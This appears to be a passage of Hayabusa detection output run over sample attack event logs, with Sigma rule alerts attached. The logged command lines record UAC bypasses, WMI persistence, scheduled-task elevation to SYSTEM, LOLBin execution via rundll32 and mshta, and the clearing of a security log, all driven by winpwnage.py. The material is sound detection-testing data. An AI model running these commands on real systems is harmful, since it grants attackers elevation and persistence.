""C:\Windows\system32\cliconfg.exe"" : Path: C:\Windows\System32\cliconfg.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx -2019-05-10 22:49:45.378 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe"" : Path: C:\Windows\System32\cliconfg.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx -2019-05-11 18:50:08.248 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx -2019-05-11 18:50:13.494 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx -2019-05-11 18:50:18.404 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx -2019-05-11 18:50:18.654 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx -2019-05-11 18:50:26.779 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe"" : Path: C:\Windows\ehome\Mcx2Prov.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx -2019-05-11 18:50:27.018 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe"" : Path: C:\Windows\ehome\Mcx2Prov.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx -2019-05-12 01:46:10.125 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx -2019-05-12 01:46:15.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx -2019-05-12 01:46:20.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx -2019-05-12 01:46:20.828 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx -2019-05-12 01:54:02.071 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx -2019-05-12 01:54:07.508 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx -2019-05-12 01:54:12.493 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx -2019-05-12 01:54:12.821 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx -2019-05-12 02:10:06.342 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx -2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,informational,Logon Type 9 - NewCredentials,User: IEUser : Workstation: : IP Address: ::1 : Port: 0 : LogonID: 0x1bbdce : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx -2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx -2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx -2019-05-12 02:28:17.176 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx -2019-05-12 02:28:19.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmstp.exe"" /au c:\users\ieuser\appdata\local\temp\tmp.ini : Path: C:\Windows\System32\cmstp.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx -2019-05-12 02:28:19.567 +09:00,IEWIN7,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx -2019-05-12 02:28:22.598 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx -2019-05-12 02:28:22.598 +09:00,IEWIN7,13,high,CMSTP Execution Registry Event,,rules/sigma/registry_event/sysmon_cmstp_execution_by_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx -2019-05-12 02:28:22.598 +09:00,IEWIN7,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx -2019-05-12 02:57:49.903 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -5 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:22.809 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:23.215 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer CREATE Name=""BotConsumer23"", ExecutablePath=""c:\Windows\System32\cmd.exe"", CommandLineTemplate=""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:23.450 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name=""BotFilter82""', Consumer='CommandLineEventConsumer.Name=""BotConsumer23""' : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:23.590 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter CREATE Name=""BotFilter82"", EventNameSpace=""root\cimv2"", QueryLanguage=""WQL"", Query=""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:50.090 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:54.887 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer WHERE Name=""BotConsumer23"" DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:55.028 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter WHERE Name=""BotFilter82"" DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:55.153 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=""BotFilter82""' DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 03:10:42.434 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 1 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx -2019-05-12 03:10:42.668 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx -2019-05-12 03:10:42.668 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx -2019-05-12 09:32:24.461 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 09:32:30.211 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 09:32:30.211 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Suspicius Add Task From User AppData Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 09:32:35.258 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /run /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 09:32:35.352 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 09:32:40.342 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /delete /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 22:30:32.931 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:30:46.400 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:30:46.400 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:30:46.556 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:32:58.167 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:32:58.167 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:33:37.078 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:33:37.078 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:33:59.743 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:33:59.743 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:00.523 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:00.523 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:00.712 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:01.383 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:55:56.626 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx -2019-05-12 22:56:12.652 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" shdocvw.dll,OpenURL 